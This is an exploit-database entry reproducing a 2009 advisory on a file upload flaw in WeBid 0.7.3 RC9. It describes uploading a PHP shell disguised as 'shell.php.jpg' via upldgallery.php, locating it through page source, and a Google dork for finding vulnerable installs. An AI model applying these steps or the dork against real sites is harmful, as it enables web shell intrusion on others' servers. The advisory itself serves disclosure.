header-logo
Suggest Exploit
vendor:
WeBid
by:
Ahmad Pay
7.5
CVSS
HIGH
Remote File Upload Vulnerability
434
CWE
Product Name: WeBid
Affected Version From: <= 0.7.3 RC9
Affected Version To: <= 0.7.3 RC9
Patch Exists: NO
Related CWE: N/A
CPE: a:webid:webid:0.7.3_rc9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WeBid <= 0.7.3 RC9 Remote File Upload Vulnerability

Anyone can upload shell php with extension eg: shell.php.jpg. The shell address can be found by right clicking to the pages to find the shell path.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------------------------

Author       : Ahmad Pay
Date         : March, 25 2009
Location     : Bojonegoro, Indonesia
Critical     : High
Impact       : System Access
Where        : From Remote
---------------------------------------------------------------------------
Application  : WeBid
version      : <= 0.7.3 RC9
Vendor       : http://sourceforge.net/projects/simpleauction

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~

Anyone can upload shell php with extension eg: shell.php.jpg.


Poc/Exploit:
~~~~~
http://www.example.com/[path]/upldgallery.php

Then after upload shell right click to the pages to find your shell path

#######################################
eg:
</script>
</head>

<body bgcolor="#FFFFFF">
<div class="container">
<img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="float: left; margin-right: 10px;" id="thumbnail" alt="Create Thumbnail" />
<div style="float:left; position:relative; overflow:hidden; border:#000000 double; width:0; height:0;">

    <img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="position: relative;" alt="Thumbnail Preview" />
</div>
#######################################

Shell address above is : http://www.example.com/[path]/uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg

--------------------------------------------------------------------------

Dork:
~
Google : Powered by WeBid © 2008, 2009 Webid

# milw0rm.com [2009-03-25]

Navigation

Suggest Exploit

Services By CQR